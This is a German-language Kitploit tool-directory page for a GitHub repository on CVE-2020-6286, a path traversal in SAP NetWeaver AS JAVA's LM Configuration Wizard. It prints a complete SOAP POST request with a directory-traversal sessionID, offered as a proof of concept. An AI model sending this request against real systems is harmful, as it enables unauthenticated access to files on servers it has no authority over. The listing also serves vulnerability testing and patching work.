Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-6286 — [CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Verzeichnis-Traversal | Kitploit
Tools/GitHubGitHub/murataydemir/cve-2020-6286
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubmurataydemir/cve-2020-6286

CVE-2020-6286

[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Verzeichnis-Traversal

Repository anzeigen
62vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Verzeichnis-Traversal


SAP NetWeaver ist die integrierte Technologieplattform von SAP und die technische Grundlage aller SAP-Anwendungen seit SAP Business Suite. SAP NetWeaver ist eine serviceorientierte Anwendungs- und Integrationsplattform, die eine Entwicklungs- und Laufzeitumgebung für SAP-Anwendungen bereitstellt und auch für individuelle Entwicklung sowie die Integration mit anderen Anwendungen und Systemen genutzt werden kann. Die unzureichende Validierung des Eingabepfads eines bestimmten Parameters im Webservice von SAP NetWeaver AS JAVA (LM Configuration Wizard), Versionen 7.30, 7.31, 7.40, 7.50, ermöglicht einem nicht authentifizierten Angreifer, eine Methode auszunutzen, um ZIP-Dateien in ein bestimmtes Verzeichnis herunterzuladen, was zu einem Pfad-Traversal führt.

Für einen sicheren Proof of Concept können Sie die folgende Anfrage verwenden. Wenn die ZIP-Datei auf dem entfernten Host vorhanden ist, wird die Datei 111.zip heruntergeladen.

root@kitploit:~
POST /CTCWebService/CTCWebServiceBean HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction: 
Content-Length: 340

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
    <soapenv:Header />
    <soapenv:Body>
        <urn:queryProtocol>
            <sessionID>/../../../../../../../../../../../../../../../../../..111</sessionID>
        </urn:queryProtocol>
    </soapenv:Body>
</soapenv:Envelope>
Tool herunterladen